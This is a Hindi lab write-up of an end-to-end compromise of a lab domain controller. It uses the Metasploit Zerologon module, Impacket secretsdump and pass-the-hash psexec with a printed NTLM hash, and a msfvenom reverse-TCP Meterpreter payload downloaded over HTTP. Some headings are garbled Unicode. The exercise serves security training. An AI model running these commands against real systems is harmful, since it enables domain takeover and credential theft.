
Metasploit और Impacket का उपयोग करके एंड-टू-एंड डोमेन कंट्रोलर शोषण: DC10 की खोज, Zerologon (CVE-2020-1472) का शोषण, NTLM हैश निकाले, SYSTEM शेल प्राप्त किया, और Meterpreter सत्र स्थापित किया।
एंड-टू-एंड डोमेन नियंत्रक शोषण मेटास्प्लोइट और इम्पैकेट का उपयोग करते हुए: DC10 की खोज की, Zerologon (CVE-2020-1472) का शोषण किया, NTLM हैश निकाले, SYSTEM शेल प्राप्त किया, और एक Meterpreter सत्र स्थापित किया।
कार्यकारी सारांश यह अभ्यास एक पूर्ण, यथार्थवादी हमले की श्रृंखला को प्रदर्शित करता है जो एक डोमेन नियंत्रक के विरुद्ध था जो CVE-2020-1472 (Zerologon) के लिए कमजोर था। इस संलग्नता में खोज, सेवा संवर्धन, शोषण, क्रेडेंशियल निष्कर्षण, पार्श्व गति, और पोस्ट-एक्सप्लॉइटेशन सत्यापन शामिल था। मैंने सफलतापूर्वक SYSTEM-स्तरीय पहुंच प्राप्त की और Zerologon, Impacket secretsdump + pass-the-hash, और msfvenom/meterpreter पेलोड के संयोजन का उपयोग करके DC पर एक स्थायी Meterpreter सत्र स्थापित किया। स्क्रीनशॉट और कमांड आर्टिफैक्ट प्रत्येक चरण में साक्ष्य के रूप में कैप्चर किए गए।
𝐋𝐚𝐛 𝐨𝐯𝐞𝐫𝐯𝐢𝐞𝐰: एक पूर्ण हमले की श्रृंखला का अनुकरण एक 𝐖𝐢𝐧𝐝𝐨𝐰𝐬 𝐃𝐨𝐦𝐚𝐢𝐧 𝐂𝐨𝐧𝐯𝐨𝐥𝐥𝐞𝐫 का उपयोग करते हुए 𝐌𝐞𝐁𝐚𝐬𝐩𝐥𝐨𝐢𝐁 और 𝐈𝐦𝐩𝐚𝐜𝐤𝐞𝐁 ; discovery, Zerologon, secretsdump, pass-the-hash, और एक नियंत्रित Meterpreter सत्र।
𝐖𝐡𝐁 𝐢𝐁 𝐦𝐚𝐁𝐞𝐁𝐁𝐁𝐁 𝐁𝐨 𝐨𝐁𝐁𝐚𝐁𝐢𝐁𝐚𝐁𝐢𝐨𝐁𝐁: क्योंकि DC संपूर्ण डोमेन के लिए प्रमाणीकरण, समूह नीति और पहचान को नियंत्रित करता है, एक समझौता पूर्ण व्यवसाय व्यवधान, खाता अधिग्रहण, डेटा चोरी, रैनसमवेयर तैनाती और नियामक विश्वास की हानि में बदल सकता है। DCs की सुरक्षा, हमलावरों को पहचान को विफलता के एकल बिंदु में बदलने से रोककर, अपटाइम, राजस्व और प्रतिष्ठा की रक्षा करती है।
आपको एक सीमित लैब नेटवर्क में दो मशीनें प्रदान की गई हैं। एक प्रणाली Windows Domain Controller (DC) है जिसका नाम DC10 है जो कोर AD सेवाओं की मेजबानी करता है। दूसरी प्रणाली एक Kali वर्कस्टेशन है जो परीक्षण के लिए उसी सर्वर सबनेट में रखा गया है। DC से विशिष्ट डोमेन सेवाओं (उदाहरण के लिए, LDAP, Kerberos, SMB) को उजागर करने की उम्मीद है और यह ज्ञात मुद्दों के लिए कमजोर हो सकता है। Kali होस्ट का उपयोग टोही, शोषण, क्रेडेंशियल एक्सेस, पार्श्व गति और पोस्ट-एक्सप्लॉइटेशन सत्यापन के लिए किए जाने की उम्मीद है। कार्य DC की पहचान करना, डोमेन विवरण की पुष्टि करना, एक लागू तकनीक का उपयोग करके प्रारंभिक पैर जमाना प्राप्त करना, प्रशासनिक पहुंच को सक्षम करने के लिए क्रेडेंशियल सामग्री निकालना, और फिर एक रिमोट शेल और एक प्रबंधित एजेंट सत्र के माध्यम से DC पर नियंत्रण प्रदर्शित करना है, साथ ही पैच की गई सेवाओं, प्रतिबंधित निकास, या एंडपॉइंट डिफेंस जैसी किसी भी पर्यावरणीय बाधाओं के अनुकूल होना। DC: 10.1.16.1 Kali: 10.1.16.66
मैंने DB समर्थन के साथ msfconsole का उपयोग किया, MSF के भीतर से nmap स्वीप चलाया, परिणाम आयात किए, और DC10 एक्सपोजर की पुष्टि करने के लिए होस्ट और सेवाओं को परिष्कृत किया।
मैंने MSF में SYN पोर्ट स्कैन किया, SMB फिंगरप्रिंट किया, और 10.1.16.1 पर LDAP और Kerberos की पुष्टि की। मैंने डोमेन नाम प्राप्त करने के लिए LDAP क्वेरी की।
### SMB संस्करण जांच
auxiliary/scanner/smb/smb_version।
auxiliary/gather/ldap_query का उपयोग किया।
मैंने DC10 के विरुद्ध auxiliary/admin/dcerpc/cve_2020_1472_zerologon चलाया ताकि मशीन खाता पासवर्ड खाली कर दिया जाए।
Impacket का उपयोग करके, मैंने DC से NTLM हैश डंप किए और pass-the-hash के लिए Administrator क्रेडेंशियल की पहचान की।
impacket-secretsdump -just-dc-ntlm structureality/dc10\[email protected]
मैंने DC10 पर SYSTEM-स्तरीय शेल प्राप्त करने और होस्ट पहचान को मान्य करने के लिए pass-the-hash का उपयोग किया।
impacket-psexec structureality/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:dae57d78fec919471799ce0fae8236b9
जैसा कि आप देख सकते हैं, मैं पहले से ही C:\Windows\system32 में हूं।
मैंने reverse_tcp meterpreter पेलोड उत्पन्न किया, इसे HTTP पर होस्ट किया, DC10 पर डाउनलोड किया, एक हैंडलर शुरू किया, और Meterpreter सत्र खोलने के लिए पेलोड निष्पादित किया।
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.1.16.66 LPORT=4567 -f exe -o secretfile.exe
मैंने लक्ष्य प्रणाली को इस meterpreter निष्पादन योग्य तक आसानी से पहुंचने की अनुमति देने के लिए एक बुनियादी वेब सर्वर लॉन्च किया:
python3 -m http.server 8080
लक्ष्य मशीन पर, मैंने meterpreter निष्पादन योग्य (secret.exe) निष्पादित किया।
जैसा कि आप देख सकते हैं, मैंने अब लक्ष्य DC10 और Kali प्रणालियों के बीच एक रिवर्स शेल कनेक्शन स्थापित कर लिया है। यह कमजोर लक्ष्य के विरुद्ध केवल बाहरी/रिमोट एक्सप्लॉइट का उपयोग करके पूरा किया गया।
जबकि Kali प्रणाली DC10 लक्ष्य के साथ सर्वर सबनेट में स्थित है, ये प्रकार के हमले इंटरनेट पर संभव हैं यदि लक्ष्य प्रणाली खुले इंटरनेट के लिए उजागर हो।